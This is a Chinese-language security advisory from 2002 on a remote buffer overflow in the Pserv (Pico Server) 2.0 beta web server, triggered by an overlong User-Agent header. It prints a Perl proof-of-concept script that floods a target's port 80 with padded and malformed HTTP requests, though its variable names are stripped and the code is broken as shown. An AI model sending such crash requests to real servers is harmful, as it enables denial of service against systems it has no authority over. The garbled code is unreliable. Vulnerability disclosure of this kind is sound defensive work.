Pserv User-Agent HTTP头存在缓冲区溢出发布时间:2002-11-30 更新时间:2002-11-30 严重程度:中 威胁程度:远程拒绝服务 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:6286 受影响系统 Pserv Pserv 2.0 beta 5详细描述 Pico Server是免费的WEB服务程序。 攻击者如果提交带超长User-Agent头字符串的HTTP请求,由于在处理时不正确分配缓冲区,可以导致堆栈破坏,缓冲区溢出,存在执行任意代码可能。 测试代码 GET / HTTP/1.0 User-Agent: [buffer] #!/usr/bin/perl -w use IO::Socket; = "Pserv 2.0 Beta 1, 2, 3, 5"; unless (@ARGV == 1) { print "\n By Sapient2003\n"; die "usage: -bash <host to exploit>\n"; } print "\n By Sapient2003\n"; = "A" x 500; = "GET / HTTP/1.0\nUser-Agent: \n\n"; = "GET / HTTP/1.0\n\n"; = "GET / HTTP/1.\n\n"; = IO::Socket::INET->new( PeerAddr => [0], PeerPort => 80, Proto => "tcp", ) or die "Can't find host [0]\n"; print ; print "Attempted to exploit User-Agent HTTP Header\n"; close(); = IO::Socket::INET->new( PeerAddr => [0], PeerPort => 80, Proto => "tcp", ) or die "Can't find host [0]\n"; print ; print "Attempted to exploit HTTP Request Parsing\n"; close(); 解决方案 尚无 相关信息 "Matthew Murphy" <mattmurphy@kc.rr.com>. 参考:http://marc.theaimsgroup.com/?l=bugtraq&m=103884399831294&w=2 相关主页:http://pserv.sourceforge.net/ |
